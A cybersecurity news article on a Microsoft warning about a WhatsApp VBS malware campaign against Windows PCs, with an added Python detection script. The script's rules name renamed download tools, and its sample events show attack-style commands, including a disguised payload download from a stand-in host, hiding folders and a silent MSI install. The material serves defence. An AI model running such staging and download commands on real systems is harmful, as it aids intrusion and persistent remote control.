
Microsoft Warns of Malicious WhatsApp Chat Attachments

Microsoft warns of a malicious campaign using WhatsApp attachments to deliver malware and gain remote access to Windows PCs.

Microsoft is warning of a malicious WhatsApp campaign delivering malware-laced attachments capable of planting backdoors on targeted users' Windows PCs.

Microsoft said attackers have been running a campaign since late February 2026 and are using malicious executable WhatsApp attachments that contain a Visual Basic Script file to gain persistence and remote access on targeted Windows systems.

The technique, described in a Microsoft Defender researcher blog post published Tuesday, is not tied to a WhatsApp software flaw; rather, it relies on persuading the recipient to open the attached file.

Microsoft described the threat as a social-engineering chain where the victim runs a malicious file. Attackers then leverage a living-off-the-land attack, where adversaries abuse standard Windows components — including Visual Basic Script (VBS), cmd.exe, User Account Control settings, registry changes and unsigned MSI installers.

The research did not distinguish the exposure risk for Windows users running the WhatsApp Desktop app from that for users of the WhatsApp Web application.

The attack begins with social engineering. A user must manually open and execute the malicious VBS file received via a WhatsApp message. Without this first click, the infection chain cannot begin. The goal is to turn a normal Windows laptop into a machine the attackers can revisit with elevated privileges, quietly control and use to pull down more tools or steal data.

Unpacking the Crime

Once that first script runs, the attackers try to make the PC easier to control and harder to clean. Microsoft said the malware hides its activity by creating hidden folders in C:\ProgramData and renaming legitimate Windows tools such as curl.exe and bitsadmin.exe so they blend in with normal system activity. It then pulls next-stage payloads from cloud services including AWS, Tencent Cloud and Backblaze B2, tampers with UAC and registry settings, and drops unsigned MSI packages such as Setup.msi, WinRAR.msi, LinkPoint.msi and AnyDesk.msi.

Microsoft's practical advice is straightforward: do not open unexpected WhatsApp attachments, even if they appear to come from someone you know.

For IT teams, Microsoft is advising administrators to restrict privileges for script code in Windows. Administrators are also advised to turn on endpoint protections such as cloud-delivered protection and tamper protection, and to put EDR in block mode so that obfuscated scripts and VBScript-launched downloads are blocked.
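The behaviours described above (download tools renamed to blend in, a script host spawning a downloader, hidden folders under C:\ProgramData, MSI packages installed from that staging area) can each be expressed as a simple process-creation rule. The following is an added example, not Microsoft's detection logic or anything from the blog post: it runs four such heuristics over constructed, Sysmon-style sample events with assumed field names (image, original_file_name, parent_image, command_line).

```python
"""Detection heuristics for the WhatsApp VBS living-off-the-land chain.
Added example with constructed sample events; not Microsoft's own rules."""
from pathlib import PureWindowsPath

DOWNLOADERS = {"curl.exe", "bitsadmin.exe"}   # tools the campaign renames
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # VBScript interpreters


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


def classify(event: dict) -> list:
    """Return the labels of every heuristic that fires for one event."""
    hits = []
    image, orig = _name(event["image"]), event.get("original_file_name", "").lower()
    parent, cmd = _name(event["parent_image"]), event.get("command_line", "").lower()
    # 1. A download tool whose on-disk name no longer matches its PE metadata
    if orig in DOWNLOADERS and image != orig:
        hits.append("renamed_lolbin")
    # 2. A downloader (by real identity or name) spawned directly by a script host
    if parent in SCRIPT_HOSTS and (orig in DOWNLOADERS or image in DOWNLOADERS):
        hits.append("script_host_download")
    # 3. cmd.exe marking a directory under ProgramData as hidden
    if image == "cmd.exe" and "attrib" in cmd and "+h" in cmd and "\\programdata\\" in cmd:
        hits.append("hidden_programdata_dir")
    # 4. msiexec installing a package staged under ProgramData
    if image == "msiexec.exe" and "\\programdata\\" in cmd and ".msi" in cmd:
        hits.append("msi_from_programdata")
    return hits


# Constructed sample events (hypothetical paths and names, not real IoCs).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\curl.exe", "original_file_name": "curl.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "curl.exe -O https://example.invalid/file"},       # benign
    {"image": r"C:\ProgramData\.cache\update.exe", "original_file_name": "curl.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": "update.exe -o stage2.bin https://example.invalid/s2"},
    {"image": r"C:\Windows\System32\cmd.exe", "original_file_name": "Cmd.Exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'cmd.exe /c attrib +h +s "C:\ProgramData\.cache"'},
    {"image": r"C:\Windows\System32\msiexec.exe", "original_file_name": "msiexec.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'msiexec.exe /i "C:\ProgramData\.cache\Setup.msi" /qn'},
]


def scan(events: list) -> list:
    """(image, labels) for every event that triggers at least one heuristic."""
    return [(e["image"], classify(e)) for e in events if classify(e)]
```

The first sample event (curl.exe launched from Explorer under its own name) produces no hit, which is the point: each rule keys on the mismatch or the parent, not on the tool itself.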

Related research from Trend Micro reported in October 2025 that a Windows-focused WhatsApp campaign in Brazil used malicious ZIP attachments and active WhatsApp Web sessions to spread to more contacts. Dutch intelligence also said in March 2026 that Russian state actors were targeting Signal and WhatsApp users with phishing and social engineering to take over accounts.

The techniques differ, but the throughline is the same lesson: messaging apps are increasingly being used as the lure, the delivery channel or the compromise path.


Shaun Nichols is an IT news journalist. He has spent nearly 20 years covering the industry with a specialty in the cybersecurity

Illustration by Mariia Shalabaieva on Unsplash
